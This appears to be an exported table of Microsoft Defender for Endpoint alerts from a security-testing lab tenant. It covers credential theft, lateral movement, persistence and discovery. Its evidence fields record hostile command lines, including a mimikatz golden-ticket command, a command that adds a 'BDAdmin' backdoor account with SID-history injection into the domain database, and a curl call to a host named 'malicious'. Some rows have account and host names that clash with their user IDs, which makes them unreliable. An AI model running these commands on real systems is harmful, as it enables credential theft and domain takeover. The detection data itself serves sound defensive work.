"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:24:45.5696509Z",
"processId": 6984,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:33:31.2833333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:31:41.876943Z",
"processId": 9664,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:19.8933333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:33:42.4457797Z",
"processId": 9656,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:10:38.7433333Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 4,976 | whoami /all | 2022-11-18T05:04:12.7150402Z | 4,680 | 2022-11-10T07:07:26.0872385Z | explorer.exe | C:\Windows | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:19:56.9466667Z | Suspicious | Active | steve | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | ded8fd7f36417f66eb6ada10e0c0d7c0022986e9 | bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527 | cmd.exe | C:\Windows\System32 | 6,240 | curl http://malicious | 2022-11-11T08:17:58.2692455Z | 268 | 2022-11-11T08:17:57.8297749Z | PSEXESVC.exe | C:\Windows | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:36:07.8466667Z | Suspicious | None | steve | rnd.local | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:11:51.33Z | Unknown | None | steve | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | ded8fd7f36417f66eb6ada10e0c0d7c0022986e9 | bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527 | cmd.exe | C:\Windows\System32 | 3,020 | "cmd" /c "net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\"" && net.exe start ntds" | 2022-11-21T02:07:15.6313121Z | 7,232 | 2022-11-21T02:07:15.1389846Z | PSEXESVC.exe | C:\Windows | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:15:31.2733333Z | Suspicious | None | jeff | prod.env | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:05.72Z | Suspicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 8,284 | dir C:\ | 2022-11-18T05:10:14.6889142Z | 620 | 2022-11-16T03:32:19.0279725Z | services.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
da638037527860148530_259056164 | 7044e96a-d5f6-4626-aa4e-8b05f05b825f | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:39:46.0148718Z | 2022-11-12T01:35:42.87Z | 2022-11-11T08:48:29.6221444Z | 2022-11-11T08:07:33.1222892Z | 2022-11-11T08:07:33.1222892Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | Resolved | Medium | 41 | Benign | TruePositive | SecurityTesting | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:39:46.1966667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T08:39:46.1966667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.",
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-11T08:39:46.1966667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930950835514_396878374 | 7a8be391-9140-4529-b727-24c7b062077e | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:04:55.0835712Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:02:30.8693215Z | 2022-11-21T02:02:30.8693215Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "staging.net",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:55.1233333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:55.1233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt: /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-11-21T02:02:27.4595079Z",
"processId": 8332,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:05:51.15Z | Suspicious | None | alice | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153616536652_-889205213 | 534afbf0-7bdc-4470-a633-28807fb148e2 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:16:01.6536834Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:12:00.8318757Z | 2022-09-30T06:13:03.9031628Z | Suspicious file registered as a service | A file with suspicious attributes or involved in possible breach activity was registered as a service. An attacker might be attempting to register the file as a service for persistence. | Persistence | Resolved | Medium | 22 | TerminatedBySystem | TruePositive | SecurityTesting | WindowsDefenderAtp | d15c9f84-aabc-46e5-a92e-7bb3ce5eceda | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1021.002",
"T1074.002",
"T1543.003",
"T1569.002",
"T1570"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Critical",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:16:01.7066667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:16:01.7066667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:16:01.7066667Z",
"fileName": "ntoskrnl.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": "2022-09-15T03:19:28.401449Z",
"processId": 4,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "16b6990ada0b0ccee28440afc00f9aa6bdc45f62",
"sha256": "cc9b3a6c057ca31d0886c8efb7965a4c47e2d80fd0185d9b9fa55c5dc1d0dc55",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:10:39.1833333Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 9,516 | powershell.exe C:\M365DAttack\Get-KRBTicket.ps1 | 2022-11-18T05:09:31.3384203Z | null | null | null | null | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:19:56.9466667Z | Suspicious | Active | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | ded8fd7f36417f66eb6ada10e0c0d7c0022986e9 | bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527 | cmd.exe | C:\Windows\System32 | 6,240 | "cmd" /c "net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\"" && net.exe start ntds" | 2022-11-11T08:17:58.2692455Z | 268 | 2022-11-11T08:17:57.8297749Z | PSEXESVC.exe | C:\Windows | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:20:15.74Z | Unknown | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:04:26.1266667Z | Suspicious | None | jeff | rnd.local | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:07:46.14Z | Benign | None | ronhd | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072957109047022_-1951943437 | 7a218a68-6d11-49a4-82d9-c0310ab253ed | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:48:30.9047201Z | 2022-12-22T08:48:31.6266667Z | null | 2022-12-22T08:26:21.72798Z | 2022-12-22T08:47:12.1411574Z | Suspicious RDP session | A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives. | SuspiciousActivity | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8 | null | null | null | [
"T1021.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "MSDXV8-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-12-22T08:48:30.9266667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:08:06.97Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,948 | copy con test.txt | 2022-11-21T02:06:53.9715954Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | \Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T21:45:31.95Z | Suspicious | None | svc_acct | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:58:27.8633333Z | Suspicious | None | bob | null | S-1-12-1-2269820315-1261997569-3294602117-2733835123 | 874ab59b-8e01-4b38-85a3-5fc47303f3a2 | msftadmin@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T21:15:13.68Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045931511124826_-2037955442 | 72e5ed84-28b4-4e06-b94e-0fc890c34332 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:05:51.1125047Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T01:55:47.8840459Z | 2022-11-21T02:02:27.3917772Z | Suspicious System Owner/User Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1033",
"T1059.001",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "None",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:05:51.15Z",
"fileName": null,
"filePath": null,
